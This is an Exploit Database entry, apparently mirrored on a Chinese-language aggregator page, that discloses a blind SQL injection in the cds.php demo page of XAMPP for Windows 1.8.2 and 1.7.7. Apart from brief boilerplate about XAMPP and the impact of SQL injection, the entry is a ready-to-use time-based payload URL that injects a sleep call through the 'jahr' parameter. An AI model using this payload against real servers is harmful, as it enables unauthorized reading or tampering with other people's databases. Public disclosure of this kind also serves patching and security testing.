XAMPP for Windows 1.8.2 – Blind SQL Injection

• Exploit Database
• 9 阅读

• 作者： Sebastián Magof
  日期： 2013-10-29
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/29292/

• # Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection
  # Date: 2013/10/28
  # Exploit Author: Sebastián Magof
  # Vendor Homepage: apachefriends.org
  # Software Link: apachefriends.org/en/xampp-windows.html
  # Version:1.8.2/1.7.7
  # Tested on: Windows
  # Twitter: @smagof
  #Greetz: Family, Friends && Under guys;
  #Special Greetz: My Alpha (:
  
  
  #Description:XAMPP is a platform-independent server, free software, which
  mainly consists of the MySQL database, the Apache web server and
  interpreters for scripting languages: PHP and Perl. The name comes from
  the acronym for X, Apache, MySQL, PHP, Perl.
  
  
  #Sql-Injection: An attacker may execute arbitrary SQL statements on the
  vulnerable system. This may compromise the integrity of your database
  and/or expose sensitive information.
  #Vulnerable file: cds.php
  #Parameter: "jahr="
  
  #Exploit:
  http://127.0.0.1/xampp/cds.php?jahr=1967 AND
  sleep(3)&interpret=1&titel=555-666-0606
  
  
  
  # (\/)
  # (**)
  #(")(")